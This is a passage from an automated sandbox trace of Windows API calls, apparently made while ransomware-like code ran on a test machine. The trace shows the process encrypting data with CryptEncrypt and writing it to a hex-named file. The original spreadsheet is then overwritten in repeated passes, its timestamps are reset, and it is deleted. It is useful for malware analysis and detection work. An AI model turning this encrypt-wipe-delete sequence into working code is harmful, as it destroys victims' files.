dwFlags=0x0, pbData=0x227d0d0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x227d0d0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.693] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x227d120*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x227d120*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.693] WriteFile (in: hFile=0x380, lpBuffer=0x227d170*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x227d170*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0074.694] CloseHandle (hObject=0x380) returned 1 [0074.695] CloseHandle (hObject=0x36c) returned 1 [0074.695] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0074.695] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0074.695] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0074.695] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", lpFilePart=0x0) returned 0x48 [0074.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0074.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.695] GetFileType (hFile=0x36c) returned 0x1 [0074.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0074.695] GetFileType (hFile=0x36c) returned 0x1 [0074.695] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.696] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.697] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.698] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.699] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x820, lpOverlapped=0x0) returned 1 [0074.700] ReadFile (in: hFile=0x36c, lpBuffer=0x227e868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x227e868*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0074.700] CloseHandle (hObject=0x36c) returned 1 [0074.702] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7.info", lpFilePart=0x0) returned 0x4d [0074.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0074.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.702] GetFileType (hFile=0x36c) returned 0x1 [0074.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0074.702] GetFileType (hFile=0x36c) returned 0x1 [0074.702] WriteFile (in: hFile=0x36c, lpBuffer=0x228af18*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x228af18*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0074.703] CloseHandle (hObject=0x36c) returned 1 [0074.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0074.704] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8336b140, ftCreationTime.dwHighDateTime=0x1d52562, ftLastAccessTime.dwLowDateTime=0x4e064650, ftLastAccessTime.dwHighDateTime=0x1d4b4a3, ftLastWriteTime.dwLowDateTime=0x4e064650, ftLastWriteTime.dwHighDateTime=0x1d4b4a3, nFileSizeHigh=0x0, nFileSizeLow=0x981c)) returned 1 [0074.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0074.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.704] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", dwFileAttributes=0x80) returned 1 [0074.704] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0074.705] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2292b20 | out: lpFileInformation=0x2292b20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8336b140, ftCreationTime.dwHighDateTime=0x1d52562, ftLastAccessTime.dwLowDateTime=0x4e064650, ftLastAccessTime.dwHighDateTime=0x1d4b4a3, ftLastWriteTime.dwLowDateTime=0x4e064650, ftLastWriteTime.dwHighDateTime=0x1d4b4a3, nFileSizeHigh=0x0, nFileSizeLow=0x981c)) returned 1 [0074.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0074.705] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0074.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.705] GetFileType (hFile=0x36c) returned 0x1 [0074.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0074.705] GetFileType (hFile=0x36c) returned 0x1 [0074.705] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.706] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.706] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.707] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.708] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.709] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.709] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.710] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.711] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.712] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.712] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0074.712] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.713] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.714] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.714] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.715] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.716] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.717] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.717] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.718] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.719] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.719] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0074.719] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.720] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.721] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.721] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.722] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.723] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.745] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.746] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.747] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.748] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.748] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0074.748] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.749] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.750] WriteFile (in: hFile=0x36c, lpBuffer=0x2292fe8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x2292fe8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.751] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.751] SetEndOfFile (hFile=0x36c) returned 1 [0074.752] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.752] CloseHandle (hObject=0x36c) returned 1 [0074.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.752] GetFileType (hFile=0x36c) returned 0x1 [0074.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.752] GetFileType (hFile=0x36c) returned 0x1 [0074.752] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.752] CloseHandle (hObject=0x36c) returned 1 [0074.752] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.753] GetFileType (hFile=0x36c) returned 0x1 [0074.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.753] GetFileType (hFile=0x36c) returned 0x1 [0074.753] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0074.753] CloseHandle (hObject=0x36c) returned 1 [0074.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.753] GetFileType (hFile=0x36c) returned 0x1 [0074.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.753] GetFileType (hFile=0x36c) returned 0x1 [0074.753] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0074.753] CloseHandle (hObject=0x36c) returned 1 [0074.753] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.753] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jo5pyafrjdxunxxq.xlsx")) returned 1 [0074.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Jo5pYAfRJdxUnxXq.xlsx", lpFilePart=0x0) returned 0x3d [0074.754] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7", lpFilePart=0x0) returned 0x48 [0074.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4B1E059CEBD8A7EF3DD31ED52AAF4DD7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4b1e059cebd8a7ef3dd31ed52aaf4dd7"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.755] GetFileType (hFile=0x36c) returned 0x1 [0074.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.755] GetFileType (hFile=0x36c) returned 0x1 [0074.755] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, 